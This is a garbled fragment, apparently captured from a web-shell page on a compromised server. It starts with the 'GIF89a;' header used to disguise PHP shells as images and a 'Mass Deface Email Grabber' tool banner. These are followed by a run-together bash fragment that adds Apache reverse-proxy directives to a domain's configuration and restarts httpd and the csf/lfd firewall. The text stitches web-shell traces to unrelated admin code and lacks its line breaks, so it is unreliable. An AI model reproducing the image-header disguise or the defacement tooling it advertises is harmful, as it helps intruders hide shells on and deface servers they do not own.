GIF89a;
Mass Deface Email Grabber
$n_node_dom_conf_file echo "" >> $n_node_dom_conf_file echo "AllowOverride All" >> $n_node_dom_conf_file echo "Require all granted" >> $n_node_dom_conf_file echo "" >> $n_node_dom_conf_file echo "" >> $n_node_dom_conf_file echo "ProxyPass http://localhost:$port/" >> $n_node_dom_conf_file echo "ProxyPassReverse http://localhost:$port/" >> $n_node_dom_conf_file echo "" >> $n_node_dom_conf_file echo '' >> $n_node_dom_conf_file echo "ProxyPass !" >> $n_node_dom_conf_file echo "ProxyPassReverse !" >> $n_node_dom_conf_file echo "" >> $n_node_dom_conf_file virtual_detail1=$(grep -no "" $n_dom_conf_file); line6=$(echo $virtual_detail1 | awk '{print $1}' FS=":"); virtual_ssl_detail1=$(grep -no "" $n_dom_ssl_conf_file); linessl6=$(echo $virtual_ssl_detail1 | awk '{print $1}' FS=":"); if [[ $line6 = *[[:digit:]]* ]]; then echo "came here"; one=1 line7=`expr $line6 - $one` linessl7=`expr $linessl6 - $one` config_detail=$( echo "IncludeOptional $n_node_dom_conf_file" | sed 's/\//\\\//g' ); echo "${line7}a $config_detail " $n_dom_conf_file sed -i "${line7}a $config_detail " $n_dom_conf_file sed -i "${linessl7}a $config_detail " $n_dom_ssl_conf_file fi SERVICE_PATH=`whereis service | awk '{print $2}'` `$SERVICE_PATH httpd restart` `$SERVICE_PATH csf restart` `$SERVICE_PATH lfd restart` CSF_PATH=`whereis csf | awk '{print $2}' | tr -d '\n'` $CSF_PATH -r fi